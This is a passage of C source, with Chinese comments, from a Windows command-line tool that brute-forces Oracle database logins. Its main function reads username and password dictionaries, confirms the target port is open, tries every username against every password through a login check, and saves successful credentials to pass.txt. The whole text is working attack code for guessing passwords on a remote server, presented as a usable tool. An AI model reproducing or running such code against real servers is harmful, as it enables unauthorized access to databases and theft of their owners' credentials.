}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
//参数不为8个的时候打印帮助
if(argc != 10)
usage();
if (argc == 10)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
usage();
if ( strcmpi(argv[6], "-d") )
usage();
if ( strcmpi(argv[8], "-i") )
usage();
}
/* determinate whether the oracle port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Can't connect to %s:%d\n", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
//取得目标地址和端口号:
strcpy(target,argv[1]);
strcpy(port,argv[3]);
strcpy(db,argv[9]);
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Can't open the password dictionary\n");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next; //指向第一个结点
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Can't open the name dictionary\n");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){
fprintf(stdout, "Can't write pass.txt file!\n");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
int j=0,i=1;
while(currnode!=NULL) //为NULL表示姓名链表结束
{
printf("\n开始第%d位用户%s测试:\n",++j,currnode->Name);
while(curr != NULL) //为NULL表示密码链表结束
{
printf("Now cracking %s->%s \n", currnode->Name, curr->password);
fflush(NULL);
int Cracked=0;
Cracked=SQLCheck(curr->password,currnode->Name);
if ( Cracked==1 )
{
printf("%d.Successfully:oracle server %s's username [%s] password [%s]\n",j,target,currnode->Name, curr->password);
fseek(passtxt, 0L, SEEK_END);//移动到文件尾部
fprintf(passtxt,"%d.Successfully:oracle server %s's username [%s] password [%s]\r\n",i++,target,currnode->Name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->Next;//移动到下一个结点
Sleep(100);//暂停100ms,即0.1s
} /* starting crack the oracle password*/
currnode = currnode->Next;
curr = head ->Next; //移到密码链表的第一个结点
}
printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount);
printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n");
fprintf(passtxt,"\r\n\r\n");
fclose(passdic);
fclose(Namedict);
fclose(passtxt);
free(head);
}
return 0;
}
